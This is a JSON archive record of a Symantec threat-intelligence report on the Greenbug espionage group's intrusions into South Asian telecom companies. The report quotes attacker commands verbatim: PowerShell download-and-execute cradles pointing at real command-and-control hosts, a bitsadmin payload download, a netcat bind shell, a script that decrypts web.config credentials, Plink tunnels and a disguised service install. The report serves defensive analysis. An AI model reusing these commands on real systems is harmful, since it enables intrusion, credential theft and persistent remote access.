{
	"id": "5e94c733-c649-4331-82fb-8cbd6dcfb400",
	"created_at": "2026-04-06T00:06:44.928265Z",
	"updated_at": "2026-04-10T03:33:11.056271Z",
	"deleted_at": null,
	"sha1_hash": "b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94",
	"title": "Sophisticated Espionage Group Turns Attention to Telecom Providers in South Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 82473,
	"plain_text": "Sophisticated Espionage Group Turns Attention to Telecom Providers in\r\nSouth Asia\r\nBy About the Author\r\nArchived: 2026-04-05 18:25:19 UTC\r\nThe Greenbug espionage group is actively targeting telecommunications companies in South Asia, with activity seen as\r\nrecently as April 2020.\r\nThere are indications that at least one of the companies was first targeted as early as April 2019.\r\nEmail appears to be the initial infection vector used by the group. Greenbug is using a mixture of off-the-shelf tools and\r\nliving-off-the-land techniques in these attacks. It appears the group is interested in gaining access to database servers; we see\r\nit stealing credentials then testing connectivity to these servers using the stolen credentials. \r\nGreenbug is believed to likely be based out of Iran, and there has been speculation in the past that it has connections to the\r\ndestructive Shamoon group, which has carried out disk-wiping attacks against organizations in Saudi Arabia. The Shamoon\r\nattacks have been extensively covered, but it was never clear how the attackers stole the credentials that allowed them to\r\nintroduce their destructive malware onto victim systems. Research by Symantec, a division of Broadcom (NASDAQ:\r\nAVGO), in 2017 found evidence that Greenbug was on an organization’s network prior to a wiping attack that involved\r\nW32.Disttrack.B (Shamoon’s malware). This link was never definitively established, but cooperation between the two\r\ngroups is considered a possibility.\r\nMuch of the activity we saw in this attack campaign is in line with activity we have seen from Greenbug in the past,\r\nincluding the use of email as an initial infection vector, the use of publicly available hack tools like Mimikatz and Plink, and\r\nthe apparent focus on collecting credentials and maintaining a persistent, low-profile presence on victim networks. 
\r\nInfection vector\r\nAcross multiple victim machines, a file named proposal_pakistan110.chm:error.html was executed via an internet browser.\r\nWe also see the same file being opened by archiver tools. While we were unable to retrieve the file for analysis, the same\r\ntechnique has been leveraged by Greenbug in the past, as early as 2016. In these earlier attacks, emails were sent to targets\r\ncontaining a link to a likely compromised site, which hosted an archive file. This archive contains a malicious CHM file\r\n(compiled HTML Help file), which includes an ADS (alternate data stream) to hide its payload, which is installed when\r\nexecuted. This file usually also contains a decoy PDF file containing an error message that says the file could not be opened\r\ncorrectly.\r\nWe have also seen similarly named files used in other organizations in the past to drop Trojan.Ismdoor, Greenbug’s custom\r\nmalware.\r\nAround the same time as we saw this file, a file called GRUNTStager.hta was also executed. Symantec believes the attackers\r\nused the publicly available Covenant post-exploitation framework in order to gain an initial foothold in their target\r\norganizations.\r\nCovenant is a publicly available hack tool that is described as “a .NET command and control framework that aims to\r\nhighlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command\r\nand control platform.” It is described as being for use by “red teams,” but is also open to being abused by malicious actors.\r\nCase study: Six-month intrusion\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\r\nPage 1 of 7\n\nGreenbug was present on the systems of one organization from October 2019 to April 2020. It appeared to be interested in\r\ngaining access to the organization’s database server. 
The attackers were observed executing various PowerShell commands\r\non the victim system.\r\nThe first activity was seen on October 11, 2019, when a malicious PowerShell command was executed to install a\r\nCobaltStrike Beacon module to download the next stage payload.\r\nWe were able to extract two command and control (C\u0026C) server addresses from the PowerShell command.\r\nInitially, the attackers leveraged this access to execute PowerShell to determine the version of PowerShell installed via\r\n$PSVersionTable. After this, we observed the attackers proceed to attempt to download a malicious file hosted on the same\r\npreviously mentioned C\u0026C server.\r\nPowerShell.exe -nop -w hidden -c $L=new-object net.webclient;$L.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$L.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX\r\n$L.downloadstring('http://95[.]179.177.157:445/0Zu5WpWN');\r\nThis command was executed several times but it is unclear if the attackers were successful. Approximately an hour later, the\r\nattackers were also observed attempting to perform a download to CSIDL_APPDATA\\a8f4.exe via the bitsadmin utility\r\nbitsadmin /transfer a8f4 http://95.179.177.157:8081/asdfd CSIDL_APPDATA\\a8f4.exe\r\nThe BITS administration utility can be used to download or upload jobs to be executed. It is a legitimate tool that we\r\ncommonly see abused by malicious actors. 
The attackers used this tool to download additional malicious tools to the\r\ncompromised machine.\r\nA short time later, the attackers executed several tools from CSIDL_SYSTEM86\\[REDACTED] directory:\r\nHash Directory Tool\r\n2a3f36c849d9fbfe510c00ac4aca1750452cd8f6d8b1bc234d22bc0c40ea1613\r\ncsidl_system_drive\\\r\n[REDACTED]\r\nrevshell.exe\r\n9809aeb6fd388db9ba60843d5a8489fea268ba30e3935cb142ed914d49c79ac5\r\ncsidl_system_drive\\\r\n[REDACTED]\r\nprinters.exe\r\n3c6bc3294a0b4b6e95f747ec847660ce22c5c4eee2681d02cc63f2a88d2d0b86\r\ncsidl_system_drive\\\r\n[REDACTED]\r\nmsf.exe\r\nThe attackers were then seen launching PowerShell and attempting to execute a PowerShell script called msf.ps1. \r\nPowerShell.exe -ExecutionPolicy Bypass -File CSIDL_SYSTEM_DRIVE\\[REDACTED]\\msf.ps1\r\nThis command was executed several times and is likely used to install a Metasploit payload to retain access to the\r\ncompromised machine. That is the last activity seen on that day.\r\nNo further activity was observed until February 6, 2020, when a suspicious PowerShell command was executed. The\r\nPowerShell command follows the execution of the w3wp.exe process – an application that is used to serve requests to a web\r\napplication. 
This may indicate that the attackers have used a webshell on the compromised machine.\r\nThe following is a copy of the PowerShell command executed by the attackers:\r\n$ErrorActionPreference = 'SilentlyContinue';$path=\"C:\\[REDACTED]\\\";Foreach ($file in (get-childitem $path -\r\nFilter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try {\r\n$connstrings = $xml.get_DocumentElement() } Catch { continue };if\r\n($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\\$tempdir -ItemType directory | out-null; copy-item $file.FullName\r\n$env:temp\\$tempdir;$aspnet_regiis = (get-childitem $env:windir\\microsoft.net\\ -Filter aspnet_regiis.exe -recurse |\r\nselect-object -last 1).FullName + ' -pdf \"\"connectionStrings\"\" ' + $env:temp + '\\' + $tempdir;Invoke-Expression\r\n$aspnet_regiis; Try { $xml = [xml](get-content $env:temp\\$tempdir\\$file) } Catch { continue };Try { $connstrings =\r\n$xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\\$tempdir -recurse};Foreach ($_ in\r\n$connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host \"\"$file.Fullname ---\r\n$_.connectionString\"\"} } };\r\nThis command is used to search for files similar to web.config. For each file found, it extracts username and password\r\ninformation where possible, decrypting it using the aspnet_regiis.exe utility. These credentials may be used to access\r\norganizational resources such as SQL servers.\r\nFurther activity was seen on February 12 and February 14. On February 12, the attackers returned and executed a tool:\r\npls.exe. 
An hour later, the attackers bound cmd.exe to a listening port using netcat with the following command:\r\nCSIDL_SYSTEM_DRIVE\\[REDACTED]\\infopagesbackup\\ncat.exe [REDACTED] 8989 -e cmd.exe\r\nThe same command was issued again about 20 minutes later.\r\nTwo days later, at 7.29am local-time, the attackers returned and connected to the listening port, launching cmd.exe.\r\nThey issued the following commands:\r\nCommand Description\r\nCSIDL_SYSTEM\\cmd.exe\" /c net user\" List all available local user accounts and information\r\nPowerShell -c Get-PSDrive -PSProvider \\\"\r\nFileSystem\\\"\"\"\"\"\"\"\r\nList all available drives on the filesystem and related information\r\n(e.g. available space, location etc.)\r\nThe next day (February 15) the attackers returned to the command prompt and issued a command to add a user and then\r\nchecked that the user was added. No further activity was observed until March 4, when a PowerShell command was\r\nlaunched at 6.30pm local time. A WMI command was also observed being executed and used to search for a specific\r\naccount. Shortly after this, the well-known credential-stealing tool Mimikatz was executed from\r\n%USERPROFILE%\\documents\\x64. \r\nOn March 11, the attackers attempted to connect to a database server via PowerShell, presumably using credentials they had\r\nstolen. The attackers also used an SQL command to retrieve the version information of the database server, presumably to\r\ntest the credentials and connectivity.\r\nPowerShell -C\r\n$conn=new-object System.Data.SqlClient.SQLConnection(\" \"\"Data\r\nSource=[REDACTED];User [REDACTED] { $conn.Open(); }Catch { continue;\r\n}$cmd = new-object System.Data.SqlClient.SqlCommand(\" \"\"select\r\n@@version;\" \"\", $conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nsystem.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\"\r\nFurther activity was seen in April. 
On April 8, suspicious PowerShell commands were observed attempting to download\r\ntools from a remote host. \r\nPowerShell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX\r\n$k.downloadstring('http://185.205.210.46:1003/iO0RBYy3O');\r\nPowerShell.exe -nop -w hidden -c $m=new-object net.webclient;$m.proxy=\r\n[Net.WebRequest]::GetSystemWebProxy();$m.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX\r\n$m.downloadstring('http://185.205.210.46:1131/t8daWgy9j13');\r\nThat was the only activity seen on April 8, then on April 13 PowerShell was launched and the following commands were\r\nobserved being executed:\r\nCommand Description\r\nPowerShell.exe\" -noninteractive -executionpolicy bypass\r\nwhoami\"\r\nCheck the account name of the current user executing the\r\ncommand\r\nPowerShell.exe\" -noninteractive -executionpolicy bypass\r\nnetstat -a\"\r\nNetwork routing information\r\nNext, PowerShell was used to connect to a database server and check the version information, likely to confirm working\r\ncredentials. This is similar to the previous PowerShell command observed with the exception of a different database server\r\nIP address.\r\nFinally, the attackers used PowerShell to view the current ARP table (IPs and hostname of machines that have recently been\r\ncommunicated with) via an arp -a command. That is the last activity we observed on this machine.\r\nA number of suspicious files were found on this machine (see IoCs). 
The files include the Covenant tool and Mimikatz, as\r\nalready mentioned, as well as Cobalt Strike, an off-the-shelf tool that can be used to load shellcode onto victim machines,\r\nand multiple webshells.\r\nOther machines on the same network\r\nWe saw suspicious activity on various machines on this same victim’s network. The attackers targeted several other users\r\nwithin the organization with the same file, proposal_pakistan110.chm:error.html, which was opened by an archiver tool and,\r\nin one instance, via the Microsoft Edge browser. Following this, we observed a backdoor being executed on the machine,\r\nalongside additional tools downloaded to the %APPDATA% directory from the attacker’s infrastructure.\r\nHash Directory Tool\r\n450ebd66ba67bb46bf18d122823ff07ef4a7b11afe63b6f269aec9236a1790cd CSIDL_COMMON_APPDATA\\oracle local.ex\r\nee32bde60d1175709fde6869daf9c63cd3227155e37f06d45a27a2f45818a3dc CSIDL_COMMON_APPDATA\\adobe adobe.e\r\n071e20a982ea6b8f9d482685010be7aaf036401ea45e2977aca867cedcdb0217 c:\\programdata\\oracle java.ee\r\nTunnels back to attackers\r\nOn one machine in this organization, we saw some suspicious PowerShell commands executed on December 9. One of the\r\nfiles executed by PowerShell, comms.exe, is Plink. A second similar command used the Bitvise command line tunneling\r\nclient. 
Both tools are used to set up a tunnel to attacker-controlled infrastructure to allow Terminal Services and RDP access\r\nto an internal machine.\r\n\"CSIDL_COMMON_APPDATA\\comms\\comms.exe\" apps.vvvnews.com -P \u003c?,?\u003e -l \u003c?,?\u003e -pw \u003c?,?\u003e -proxytype\r\nhttp_basic –proxyip [REDACTED] -proxyport 8080 -proxyuser [REDACTED].haq -proxypass [REDACTED] -C -\r\nR [REDACTED]:4015:[REDACTED]:1540\r\n\"CSIDL_COMMON_APPDATA\\comms\\comms.exe\" [REDACTED] -pw=[REDACTED] -s2c=[REDACTED] 1819\r\n[REDACTED] 3389 -proxy=y -proxyType=HTTP -proxyServer=[REDACTED] -proxyPort=8080 -proxyUsername=\r\n[REDACTED]\\[REDACTED].haq -proxyPassword=\u003c?,?\u003e\r\nTools such as Plink and Bitvise are legitimate sysadmin tools, but have been seen being exploited by malicious actors\r\nbefore, including by Iranian actors earlier this year.\r\nPlink was also seen on a second machine in this organization, which appears to have been compromised from November\r\n2019 up to April 2020. The first suspicious activity on this machine was seen on November 13, when PowerShell Remoting\r\nwas enabled on the machine to allow it to receive PowerShell commands.\r\nA PowerShell command was used to download a file from attacker controlled infrastructure and launch it with a specific\r\nargument.\r\n(New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yft.dat',\r\n'C:\\Programdata\\VMware\\Vmware.exe');\r\nstart-process C:\\Programdata\\VMware\\Vmware.exe -arg 'L3NlcnZlcj12c2llZ3J1LmNvbSAvaWQ9NDE=';\r\nThe argument decodes to /server=vsiegru.com /id=41. Shortly after this the Plink utility was executed to establish a\r\nconnection to the victim network. 
A second PowerShell command was then executed as follows: \r\nDel -force C:\\Programdata\\Vmware\\Vmware.exe;\r\n(New-Object System.Net.WebClient).DownloadFile('http://apps[.]vvvnews.com:8080/Yf.dat',\r\n'C:\\Programdata\\Nt.dat');\r\nmove C:\\Programdata\\Nt.dat C:\\Programdata\\Vmware\\VMware.exe -force;\r\ncmd.exe /c sc create \"VMwareUpdate\" binpath= \"C:\\Programdata\\Vmware\\VMware.exe\r\nL3NlcnZlcj1rb3BpbGthb3J1a292LmNvbSAvaWQ9NDkgL3Byb3h5PXllcyAvcHJveHl1cmw…[REDACTED]…\r\nBUTUxcamF2ZWQubmFiaSAvcGFzc3dvcmQ9cHRtbEAyMjMz\" displayname= \"VMware Update Service\" start=\r\nauto;\r\nstart-service VMwareUpdate;\r\nExit;\r\nThe encoded argument decodes to the following:\r\n/server=kopilkaorukov.com /id=49 /proxy=yes /proxyurl=http://[REDACTED]:8080 /credential=yes /username=\r\n[REDACTED]\\[REDACTED] /password=[REDACTED]\r\nThe attackers were then seen adding a user to the administrators group on this machine. Two further PowerShell commands\r\nwere executed on the machine about a week later, on November 16.\r\nThe first decodes to the following:\r\niex ((New-Object Net.WebClient).DownloadString('http://apps[.]vvvnews.com:8080/Default.htt'))\r\nAs the attackers have set up a tunnel, using the Plink tool, all connections appear to be routing to internal machine IP\r\naddresses. This was likely done as a means to evade detection.\r\nActivity targeting telecoms\r\nGreenbug’s activity in this campaign seems to make it clear that its main focus with these victims is to steal credentials, and\r\nto maintain a low profile on the victim’s network so the attackers can remain on it for a substantial period of time. This is\r\ntypical of the activity we have seen in Greenbug victims in the past, with maintaining persistence on a victim network\r\nappearing to be one of the group’s primary goals. 
Greenbug has also been observed targeting telecoms companies in this\r\nsame region in previous attack campaigns.\r\nThe setting up of tunnels shows how important keeping a low-profile is for this group. Its focus on stealing credentials, and\r\non establishing connections with database servers, shows that it is aiming to achieve a high level of access to a victim’s\r\nnetwork - access that if exploited could cause havoc on a compromised network very quickly. This level of access, if\r\nleveraged by actors using disruptive malware or ransomware, could shut down an organization’s entire network very\r\nquickly. \r\nPrevious victims of Greenbug have included organizations in the aviation, government, investment, and education sectors, as\r\nwell as the telecoms sector, with attacks against telecoms organizations in the Middle East in 2017. In 2019, we observed 18\r\nnation-state backed groups targeting the telecoms sector worldwide, so it seems to be an area of interest for sophisticated\r\nactors recently.\r\nIt is probably not too hard to understand why the telecommunications industry, made up of phone providers and internet\r\nservice providers (ISPs), is attractive to APT groups, whose main motivation is most often intelligence gathering. The access\r\nto calls, communications logs, and messages offered by telecoms companies makes them hugely valuable targets for these\r\nattackers.\r\nWe can only speculate about Greenbug’s motives for targeting these specific telecoms companies, but it is clear that\r\ncomprehensive and persistent access to victim networks remains the key priority for this group. 
\r\nProtection\r\nSymantec products protect against threats discussed in this blog with the following detections:\r\nTrojan.Ismdoor\r\nTrojan.Ismdoor!gen1\r\nSystem Infected: Trojan.Ismdoor Activity\r\nIndicators of Compromise (IoCs)\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia"
	],
	"report_names": [
		"greenbug-espionage-telco-south-asia"
	],
	"threat_actors": [
		{
			"id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed",
			"created_at": "2022-10-25T16:07:23.918534Z",
			"updated_at": "2026-04-10T02:00:04.789509Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [
				"Greenbug",
				"Volatile Kitten"
			],
			"source_name": "ETDA:Greenbug",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "25896473-161f-411f-b76a-f11bb26c96bd",
			"created_at": "2023-01-06T13:46:38.75749Z",
			"updated_at": "2026-04-10T02:00:03.090307Z",
			"deleted_at": null,
			"main_name": "CHRYSENE",
			"aliases": [
				"Greenbug"
			],
			"source_name": "MISPGALAXY:CHRYSENE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bba8e81-73af-4010-86dc-d43c408ca342",
			"created_at": "2023-01-06T13:46:38.553459Z",
			"updated_at": "2026-04-10T02:00:03.021597Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [],
			"source_name": "MISPGALAXY:Greenbug",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434004,
	"ts_updated_at": 1775791991,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94.pdf",
		"text": "https://archive.orkl.eu/b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94.txt",
		"img": "https://archive.orkl.eu/b6f0182c5acffaf27571fcb6f3a7c9a77ac08f94.jpg"
	}
}